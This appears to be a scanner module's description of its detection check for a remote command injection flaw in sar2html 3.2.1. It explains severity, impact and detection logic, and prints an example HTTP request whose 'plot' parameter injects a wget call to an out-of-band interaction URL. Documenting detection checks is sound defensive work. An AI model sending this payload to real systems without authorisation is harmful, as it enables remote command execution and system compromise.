sar2html 3.2.1 - Remote Command Injection

What is the "sar2html 3.2.1 - Remote Command Injection?" module?

The "sar2html 3.2.1 - Remote Command Injection" module is designed to detect a vulnerability in the SAR2HTML software. SAR2HTML is a tool used for generating graphical reports from system activity data collected by the SAR command. This module focuses on a specific version of SAR2HTML (3.2.1) and identifies a critical remote command injection vulnerability.

The severity of this vulnerability is classified as critical, indicating that it poses a significant risk to the affected system. It allows a remote attacker to execute arbitrary commands on the target system by exploiting a command injection flaw in the index.php script of SAR2HTML.

This module was authored by gy741.

Impact

If successfully exploited, this vulnerability could allow an attacker to execute arbitrary commands on the target system. This can lead to unauthorized access, data theft, system compromise, and potential disruption of services.

How does the module work?

The module works by sending a specially-crafted HTTP request to the target system's index.php script. The request includes a command injection payload that exploits the vulnerability in SAR2HTML 3.2.1. Upon successful exploitation, the attacker gains the ability to execute arbitrary commands on the target system.

Here is an example of the HTTP request used by the module:

GET /index.php?plot=;wget%20http://{%InteractionURL%} HTTP/1.1
Host: {%Hostname%}
Accept: */*

The module also includes matching conditions to ensure accurate detection. In this case, it checks for the presence of the "http" protocol in the interaction URL, indicating a successful match.